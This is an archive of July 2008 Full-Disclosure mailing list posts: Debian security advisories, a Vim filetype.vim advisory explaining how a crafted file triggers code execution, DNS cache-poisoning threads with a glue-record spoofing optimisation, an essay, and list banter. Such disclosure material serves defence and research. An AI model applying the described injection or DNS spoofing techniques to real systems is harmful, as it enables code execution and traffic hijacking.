released on 30 June 2008 and is available on EMC Powerlink as CUA 4.0.1 Patch 1, under "Support -> Software Download"." Vendor URL: www.emc.com Vendor Status: Vendor was informed of the problem, and was very cooperative in getting a patch developed for the problem. However, contact was broken off by the vendor after the relevant patch was released. The vendor has not yet published an advisory stating the reason for the latest patch or the discovered vulnerability in previous versions. This vulnerability was brought to the attention of the vendor on May 20, 2008 under the policy of responsible disclosure as documented at http://www.wiretrip.net/rfp/policy.html. After cooperating on a patch the vendor did not respond to requests to release a public advisory. Therefore we have taken the initiative to alert the public through various security publications. Credit for this vulnerability finding should be given to: Lars Heidelberg, adMERITia GmbH Aaron Brown, adMERITia GmbH Disclaimer The information within this document may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information. Any use of this information lays within the user's responsibility. Mit freundlichen Grüssen / With kind regards Aaron Brown ** Der Inhalt dieser E-Mail ist ausschließlich für den bezeichneten Adressaten bestimmt. Wenn Sie nicht der vorgesehene Adressat dieser E-Mail oder dessen Vertreter sein sollten, so beachten Sie bitte, dass jede Form der Kenntnisnahme, Veröffentlichung, Vervielfältigung oder Weitergabe des Inhalts dieser E-Mail unzulässig ist. Wir bitten Sie, sich in diesem Fall mit dem Absender der E-Mail in Verbindung zu setzen. This e-mail and any files transmitted with it are confidential and intended solely for the use of the individual or organization to whom they are addressed. Should you not be the intended addressee of this e-mail or his or her representative, please note that publication, replication of the contents by any means or further communication of the content is not permissible. Should you have received this e-mail in error, please notify the sender. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1615-1] New xulrunner packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1615-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 23, 2008 http://www.debian.org/security/faq - Package: xulrunner Vulnerability : several Problem type : local/remote Debian-specific: no CVE ID : CVE-2008-2785 CVE-2008-2798 CVE-2008-2799 CVE-2008-2800 CVE-2008-2801 CVE-2008-2802 CVE-2008-2803 CVE-2008-2805 CVE-2008-2807 CVE-2008-2808 CVE-2008-2809 CVE-2008-2811 CVE-2008-2933 Several remote vulnerabilities have been discovered in Xulrunner, a runtime environment for XUL applications. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-2785 It was discovered that missing boundary checks on a reference counter for CSS objects can lead to the execution of arbitrary code. CVE-2008-2798 Devon Hubbard, Jesse Ruderman and Martijn Wargers discovered crashes in the layout engine, which might allow the execution of arbitrary code. CVE-2008-2799 Igor Bukanov, Jesse Ruderman and Gary Kwong discovered crashes in the Javascript engine, which might allow the execution of arbitrary code. CVE-2008-2800 "moz_bug_r_a4" discovered several cross-site scripting vulnerabilities. CVE-2008-2801 Collin Jackson and Adam Barth discovered that Javascript code could be executed in the context of signed JAR archives. CVE-2008-2802 "moz_bug_r_a4" discovered that XUL documements can escalate privileges by accessing the pre-compiled "fastload" file. CVE-2008-2803 "moz_bug_r_a4" discovered that missing input sanitising in the mozIJSSubScriptLoader.loadSubScript() function could lead to the execution of arbitrary code. Iceweasel itself is not affected, but some addons are. CVE-2008-2805 Claudio Santambrogio discovered that missing access validation in DOM parsing allows malicious web sites to force the browser to upload local files to the server, which could lead to information disclosure. CVE-2008-2807 Daniel Glazman discovered that a programming error in the code for parsing .properties files could lead to memory content being exposed to addons, which could lead to information disclosure. CVE-2008-2808 Masahiro Yamada discovered that file URLS in directory listings were insufficiently escaped. CVE-2008-2809 John G. Myers, Frank Benkstein and Nils Toedtmann discovered that alternate names on self-signed certificates were handled insufficiently, which could lead to spoofings secure connections. CVE-2008-2811 Greg McManus discovered discovered a crash in the block reflow code, which might allow the execution of arbitrary code. CVE-2008-2933 Billy Rios discovered that passing an URL containing a pipe symbol to Iceweasel can lead to Chrome privilege escalation. For the stable distribution (etch), these problems have been fixed in version 1.8.0.15~pre080614d-0etch1. For the unstable distribution (sid), these problems have been fixed in version 1.9.0.1-1. We recommend that you upgrade your xulrunner packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614d-0etch1.dsc Size/MD5 checksum: 1984 31304658ad202bb9e5f675c17336cf3f http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614d-0etch1.diff.gz Size/MD5 checksum: 145874 489cde3dae0240fefe68b2f53053d8c3 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614d.orig.tar.gz Size/MD5 checksum: 42800584 0a4cf16412f00f337752f57395b32ef2 Architecture independent packages: http://security.debian.org/pool/updates/main/x/xulrunner/libxul-dev_1.8.0.15~pre080614d-0etch1_all.deb Size/MD5 checksum: 2844006 fcab4e8948288b783fa4404c5c433720 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.8.0.15~pre080614d-0etch1_all.deb Size/MD5 checksum: 175680 875d41d8f381cba8311fdcec7673e00a http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-dev_1.8.0.15~pre080614d-0etch1_a
[Full-disclosure] [SECURITY] [DSA 1614-1] New iceweasel packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1614-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 23, 2008 http://www.debian.org/security/faq - Package: iceweasel Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2008-2785 CVE-2008-2933 Several remote vulnerabilities have been discovered in the Iceweasel web browser, an unbranded version of the Firefox browser. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-2785 It was discovered that missing boundary checks on a reference counter for CSS objects can lead to the execution of arbitrary code. CVE-2008-2933 Billy Rios discovered that passing an URL containing a pipe symbol to Iceweasel can lead to Chrome privilege escalation. For the stable distribution (etch), these problems have been fixed in version 2.0.0.16-0etch1. Updated packages for ia64, arm and mips are not yet available and will be released as soon as they have been built. For the unstable distribution (sid), these problems have been fixed in xulrunner 1.9.0.1-1 and iceweasel 3.0.1-1. We recommend that you upgrade your iceweasel package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Stable updates are available for alpha, amd64, hppa, i386, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.16-0etch1.diff.gz Size/MD5 checksum: 186601 1a6e2029bb1be403464dc05d0d7056f3 http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.16.orig.tar.gz Size/MD5 checksum: 47244084 838ff458cac5da69ac0f2102c9a4fa43 http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.16-0etch1.dsc Size/MD5 checksum: 1289 b20f98b6d9dea662336b8287164b326e Architecture independent packages: http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox-dom-inspector_2.0.0.16-0etch1_all.deb Size/MD5 checksum:54310 13d18b856d4e0a01e7931afef496e3ec http://security.debian.org/pool/updates/main/i/iceweasel/firefox-dom-inspector_2.0.0.16-0etch1_all.deb Size/MD5 checksum:54460 dc8582c2f9b6f7be94c881596ce9d191 http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox-gnome-support_2.0.0.16-0etch1_all.deb Size/MD5 checksum:54310 816c6f0fd47121ca9ab87116b631c210 http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dom-inspector_2.0.0.16-0etch1_all.deb Size/MD5 checksum: 239618 b130c9f2f2e153789d4081b03c1f3ecf http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox_2.0.0.16-0etch1_all.deb Size/MD5 checksum:55096 c080b75d5a9b47353c070c8ae018ee93 http://security.debian.org/pool/updates/main/i/iceweasel/firefox-gnome-support_2.0.0.16-0etch1_all.deb Size/MD5 checksum:54428 6ef73c9c91f47d9d3b9695b0baba16e0 http://security.debian.org/pool/updates/main/i/iceweasel/firefox_2.0.0.16-0etch1_all.deb Size/MD5 checksum:54572 fc0e196c2ac5634b69c8d393eaa83809 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.16-0etch1_alpha.deb Size/MD5 checksum:90158 d993f5d5638bf2644992c3a51cb07aaf http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.16-0etch1_alpha.deb Size/MD5 checksum: 51153588 537368b3db70016472e36fa96fa6d45f http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.16-0etch1_alpha.deb Size/MD5 checksum: 11577992 dfcf655ebf1ab9f30e2fdd10aee79b77 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.16-0etch1_amd64.deb Size/MD5 checksum:87828 bedb77649ba472190d25054b192b6209 http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.16-0etch1_amd64.deb Size/MD5 checksum: 10203870 5de267d5ee71e3847e73ae64872100ad http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.16-0etch1_amd64.deb Size/MD5 checksum: 50156988 105ffac099d3a73aa40be32a44cd7212 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.16-0et
Re: [Full-disclosure] Is the security industry like a lemon market?
This should play nicer with some auto-linking code: http://isis.poly.edu/csaw/ Sorry about that! -- Dan Guido ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Is the security industry like a lemon market?
This pair of essays were written in 4 hours the night before they were due for last year's Cyber Security Awareness Week at Polytechnic University. They were intended to answer the question, "Is the security industry like a lemon market?" as first brought up in a Wired article by Bruce Schneier last year [1]. We'll be hosting an essay contest and many others again this year. Contests are for students only and registration is available at: http://isis.poly.edu/csaw. Feel free to contact me for more information. -- Dan Guido [1] http://www.schneier.com/blog/archives/2007/04/a_security_mark.html --- Alicia Bozyk CSAW Essay November 18, 2007 Trends in Security Products Due to information asymmetries, consumers are unable to identify what security is and how they should be protected. They are easily swayed by market driven trends that recur on a regular basis. Such trends are not necessarily merit based and fail to solve the security problems that consumers face in meaningful ways. This problem has resulted in numerous products in the form of firewalls, antivirus software, intrusion detection systems (IDS), and anti-spyware and malware software. These products receive a lot of attention and are marketed as solving security problems. However, the same threats endure even when a user is fully covered by such mechanisms. The success of such security products on the market are a result of marketing and advertising, the lack of reliability provided by authoritative sources, and a lack of focus by industry professionals to create a comprehensive approach to improving computer security. The security industry is flooded with poor quality software products which are driven by rapidly changing security trends rather than the real needs of consumers. Any new security trend introduces an influx of security offerings to the market. The consumer market for security software reached $1.6 billion last year, according to the research company IDC. The consumer ranges from large institutions and corporations to the owners of home computers. Since the market share of the security industry is so large and its targets so varied, there are considerable opportunities to create new products as trends in the industry shift. Security companies spend a large amount of money on marketing and advertising campaigns for these new offerings. The goal is to convince consumers that they are not safe unless they purchase a new product, or upgrade their existing products to include new features. As a result, companies and individuals are constantly purchasing new security products and spending more money to improve the ones that they already have. If a consumer is unwilling to invest in products that protect against the newest threats, they run the risk of appearing negligent. However, new offerings cannot guarantee security and may not provide much added value. Trend driven advertising frightens consumers into new purchases, adding more incentive for producers to push out more and more products. Another common flaw in the security industry is that many average consumers have little or no knowledge of computer security and what it means for them. However, most consumers are convinced that they need to take some action to safeguard themselves against threats. As a result, most try at least one of the following two methods. A consumer can scour the internet for reports and reviews on security products. They can also turn to sources of authority to provide the answers for their security needs. Both methods will likely result in a consumer making unfortunate decisions about a security product that is driven by recent trends in the security industry. If a consumer tries to do their own research, it is difficult to find clear answers since they may not know what to look for and must sift through a lot of misleading advertising. If a user simply turns to an authoritative source, they might accept a bad product. For example, Columbia University Information Technology recommends that all students and faculty members install Symantec Anti-Virus software on their personal computers. Many students take this suggestion to mean that as long as they have this software installed, they are safe. However it is common knowledge among security professional and hackers alike that anti-virus is not a silver bullet, anti-virus does not protect against all security security, and anti-virus provides questionable value to begin with. The following diagram is taken from a publication by VirusTotal, an organization which tests the efficacy of all major anti-virus brands to detect new malicious code. [blue: 31692, red: 2] Failures in Detection (Last 24 Hours) Red: Infected files not detected by at least one antivirus engine. Blue: Infected files detected by all antivirus engines. This diagram is evidence that even the threats anti-virus claims to protect against, it cannot in many cases. Most consumers do not have the knowledge of th
[Full-disclosure] Vim: Flawed Fix of Arbitrary Code Execution Vulnerability in filetype.vim
1. SUMMARY Product : Vim -- Vi IMproved Version : Tested with Vim 7.2b.10, filetype.vim 2008-07-17 Impact : Arbitrary code execution Wherefrom: Local and remote CVE : CVE-2008-2712 Original : http://www.rdancer.org/vulnerablevim-filetype.vim.updated.html http://www.rdancer.org/vulnerablevim-filetype.vim.updated.patch http://www.rdancer.org/vulnerablevim-latest.tar.bz2 This is an update of a previous advisory[1]. Vim patch 7.1.300 which purported to fix the ``filetype.vim'' vulnerability did not fix the vulnerability. 2. BACKGROUND ``Vim is an almost compatible version of the UNIX editor Vi. Many new features have been added: multi-level undo, syntax highlighting, command line history, on-line help, spell checking, filename completion, block operations, etc.'' -- Vim README.txt ``Problem:Value of asmsyntax argument isn't checked for valid characters. Solution: Only accepts letters and digits.'' -- Vim Patch 7.1.300[2] 3. VULNERABILITY This is the ``filetype.vim'' vulnerability, described in the sections 3.4.2.1. and 3.4.2.2. of the original advisory[1]. It can lead to arbitrary code execution upon Vim opening a crafted file. The file can be either local or remote, and the filename must match one of the following glob patterns: *.asm *.s *.S *.a *.A *.mac *.lst (with the exception of /boot/grub/menu.lst) *.i 4. PURPORTED FIX Quoting the original advisory[1]: ``[A]bsent sanitization on line 190, followed by the execute statements at filetype.vim lines 181 or 1267: ``The code looks in the first five lines [of the file being opened] for a statement of the form ``asmsyntax=FOO'', where FOO can contain any characters except Tab and Space. FOO is then executed, without any sanitization.'' 187let head = " ".getline(1)." ".getline(2)." ".getline(3)." ".getline(4). 188 \" ".getline(5)." " 189if head =~ '\sasmsyntax=\S\+\s' *190 let b:asmsyntax = substitute(head, '.*\sasmsyntax=\(\S\+\)\s.*','\1', "") [... logical flow of the code then jumps to line 181 ...] *181exe "setf " . b:asmsyntax [... or line 1267 ...] *1267 exe "setf " . b:asmsyntax Patch 7.1.300 changed the regular expression in the substitute() call on line 190: let b:asmsyntax = substitute(head, '.*\sasmsyntax=\([a-zA-Z0-9]\+\)\s.*','\1', "") This would work if substitute() were a matching function -- returning a matching string, or an empty string if the pattern failed to match. But substitute() always returns its first argument -- substituting the matching string (if any). If the pattern fails to match, substitute() returns its first argument as-is: | pattern matches | no match --+-+ substitute() | alter match | return as-is --+-+ matching function | return match| return empty string The previous line of code (line 189) remains unchanged, leaving two different regular expressions. It is easy to create a payload matching the first regular expression, but not the second one. As a matter of fact, the payload in the test suite[3] that accompanied the original advisory did just that. It may be also worth noting that the failure to sanitize the input may not have been fatal if the ``execute'' statements on lines 181 and 1276 were updated to use the fnameescape() function to sanitize the arguments. 5. EXPLOIT The exploit needed a small update in order to work with the current Vim. It produces error messages, and the exploit text is not hidden. Making the exploit fully compatible would be just a matter of spending some more time. The updated exploit is called ``filetype.vim.updated'': --- Test results below --- --- Vim version 7.2b, included patches: 1-10 filetype.vim revision date: 2008 Jul 17 zip.vim version: v21 netrw.vim version: v127 --- filetype.vim strong : EXPLOIT FAILED weak: EXPLOIT FAILED filetype.vim.updated --> strong : VULNERABLE --> weak: VULNERABLE tarplugin : EXPLOIT FAILED tarplugin.updated: EXPLOIT FAILED tarplugin.v2: EXPLOIT FAILED zipplugin : EXPLOIT FAILED zipplugin.v2: EXPLOIT FAILED xpm.vim xpm : EXPLOIT FAILED xpm2: EXPLOIT FAILED remote : EXPLOIT FAILED gzip_vim : EXPLOIT FAILED netrw : EXPLOIT FAILED netrw.v2 : EXPLOIT FAILED netrw.v3 : EXPLOIT FAILED netrw.v4 : EXPLOIT FAILED netrw.v5 : VULNERABLE shellescape: EXPLOIT FAILED 6. PATCH A copy of a patch that fixes this vulnerability can
Re: [Full-disclosure] Nominate Dan Kaminsky for Most Overhyped BugPwnie Award
mcwidget wrote: > Given how easy it appears to be to redirect a client to a malicious web > server, > The web != the Internet. Think of POP and IMAP.Hmmm. SMTP. All those Cisco devices that still use telnet rather than Ssh... I'm /sure/ there are no SP networks whose routers don't use BGP + MD5 *and* which use unpatched or NAT'd DNS servers. Why, that's just crazy talk. There's still no patches (or anything else) from Checkpoint, Cisco, or any other vendors of vulnerable NATs, AFAIK, though Vixie and Dan Kaminsky have both said CERT are working on it. At http://blog.wired.com/27bstroke6/2008/07/kaminsky-on-how.html , Dan is quoted saying: Q: How far along are people in patching the DNS servers? Do you know how many have been patched? DK: [...] We were getting some pretty good pickup on this patch. The last time I looked at people who were testing against my site it was somewhere in 30 to 40 percent ... Is it 22:58 already? =i -- make way for history flickering like a long-lost memory ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The cat is indeed out of the bag
On Wed, Jul 23, 2008 at 10:57 AM, mokum von Amsterdam <[EMAIL PROTECTED]> wrote: > > Are you not supposed to keep DNS issues under your hat and disclose at BH > only? I think that rule /Nda exists only for Dan Kaminsky .. Rest of world is still in FD mode !! /pd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The cat is indeed out of the bag
On Wed, Jul 23, 2008 at 4:22 PM, Robert McKay <[EMAIL PROTECTED]> wrote: > > > On Tue, Jul 22, 2008 at 3:36 AM, <[EMAIL PROTECTED]> wrote: >> >> from chargen 19/udp by ecopeland >> >> 0. >> >> The cat is out of the bag. Yes, Halvar Flake figured out the flaw >> Dan Kaminsky will announce at Black Hat. >> 1. > > I believe I may have found an important optimisation to this attack. > > Basically I observed that if you make a DNS request with a very long QNAME > then nameservers start dropping GLUE records in order to fit the reply into > the maximum UDP packet size. Are you not supposed to keep DNS issues under your hat and disclose at BH only? Cheers -- Mark Andrews wrote: > ... I like simple tools. This is the list for you then -- there are lots of folk meeting the description here... --- Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The cat is indeed out of the bag
On Tue, Jul 22, 2008 at 3:36 AM, <[EMAIL PROTECTED]> wrote: > from chargen 19/udp by ecopeland > > 0. > > The cat is out of the bag. Yes, Halvar Flake figured out the flaw > Dan Kaminsky will announce at Black Hat. > 1. I believe I may have found an important optimisation to this attack. Basically I observed that if you make a DNS request with a very long QNAME then nameservers start dropping GLUE records in order to fit the reply into the maximum UDP packet size. If you query X.root-servers.net for .whatever.com then the reply you get from the root-servers can include as little as ONE actual GLUE record for .COM. Now obviously .COM will be cached by almost everyone, but the attack works on many TLDs. Consider the following query: [EMAIL PROTECTED]:~$ dig @a.root-servers.net. ..aaa.aaa.aaa.aa.a.csis-scrs.gc.caa ; <<>> DiG 9.3.1 <<>> @a.root-servers.net. ..aaa.aaa.aaa.aa.a.csis-scrs.gc.caa ; (2 servers found) ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9857 ;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 10, ADDITIONAL: 1 ;; QUESTION SECTION: ; ..aaa.aaa.aaa.aa.a.csis-scrs.gc.ca. IN A ;; AUTHORITY SECTION: ca. 172800 IN NS TLD3.ULTRADNS.ORG. ca. 172800 IN NS NS-EXT.ISC.ORG. ca. 172800 IN NS CA01.CIRA.ca. ca. 172800 IN NS CA02.CIRA.ca. ca. 172800 IN NS CA03.CIRA.ca. ca. 172800 IN NS CA04.CIRA.ca. ca. 172800 IN NS CA05.CIRA.ca. ca. 172800 IN NS CA06.CIRA.ca. ca. 172800 IN NS TLD1.ULTRADNS.NET. ca. 172800 IN NS TLD2.ULTRADNS.NET. ;; ADDITIONAL SECTION: CA01.CIRA.ca. 172800 IN A 192.228.27.11 ;; Query time: 137 msec ;; SERVER: 198.41.0.4#53(198.41.0.4) ;; WHEN: Wed Jul 23 15:16:14 2008 ;; MSG SIZE rcvd: 505 It always returns CA01.CIRA.ca. as the only GLUE record for .CA - No matter which of the X.root-serveres.net is used. It seems to me that this should greatly simply the task of gaining NS control of a TLD as you know exactly which of the nameservers to spoof your replies from. Rob. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nominate Dan Kaminsky for Most Overhyped Bug Pwnie Award
> > Hi Sandy Vagina, > > Looks like they did a U-turn after realising how over hyped the bug > actually is. > > n3td3v > So the Cat's out of the bag and the bug's public. http://blog.wired.com/27bstroke6/2008/07/kaminsky-on-how.html http://blog.invisibledenizen.org/2008/07/kaminskys-dns-issue-accidentally-leaked.html Still think this deserves a nomination? Hype. Excessive, exaggerated publicity, to give more attention than it deserves. http://www.google.co.uk/search?q=define%3Ahype Given how easy it appears to be to redirect a client to a malicious web server, is this publicity excessive? It's clearly had the most publicity but I don't think it's that clean cut. This is an awkward one as Mom and Pop web surfers sitting at home are the ones that are vulnerable here if they're redirected and phished, yet they cannot patch this and easily protect themselves through their normal methods such as Windows Update or IE7's phishing filter (correct me if I'm wrong here but I think this will report the site as OK) - they're relying on other people patching this. In their shoes, I'd be screaming for publicity for this to make sure other people are patching to keep me protected. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] AFK from fool-disclosure
afk-47 is the tool don't make act the motherfuckin fool ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nominate Dan Kaminsky for Most Overhyped Bug Pwnie Award
On Fri, Jul 11, 2008 at 9:22 PM, Sandy Vagina <[EMAIL PROTECTED]> wrote: > > n3td3v wrote: > > Please nominate Mr.DNS aka Dan Kaminsky for Most Overhyped Bug on the > > Pwnie Awards 2008. > > Perhaps if you bothered to read anywhere close to as much as you > write, you would have seen that Dino, one of the judges, specifically > disqualified this bug from the Pwnies for being too awesome: > > http://blog.trailofbits.com/2008/07/09/dan-kaminsky-disqualified-from-most-overhyped-bug-pwnie/ > Hi Sandy Vagina, Looks like they did a U-turn after realising how over hyped the bug actually is. Nominees " Unspecified DNS cache poisoning vulnerability (CVE-2008-1447) Dan Kaminsky Dan Kaminsky is credited with discovering some unspecified vulnerabilities in DNS that allow for cache poisoning on a massive the-intarweb-tubes-will-burst-and-flood-your-basement scale. There has been massive media attention over this vulnerability and a large amount of backlash in the security community over the lack of details. When the full details of the vulnerability are revealed at BlackHat, the masses will decide whether the hype and secrecy were worth it. And, more importantly, the Pwnie Judges will vote on whether Dan gets the Pwnie for Most Overhyped Bug. " http://pwnie-awards.org/2008/awards.html#overhypedbug All the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] AFK from fool-disclosure
we care we really do From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Kingcope Kingcope Sent: 18. juli 2008 19:14 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] AFK from fool-disclosure I am reachable 0nly @ two addresses: http://www.milw0rm.com http://www.com-winner.com Thanks n3td3v Signed, KingCope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] help: I need to crack my box
Paul Schmehl wrote: > So call your customer up and walk him through rebooting, going into single > user mode and changing the password. Ahahah, I had to walk him through typing an '@' once, and it was hard enough... Lucio. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
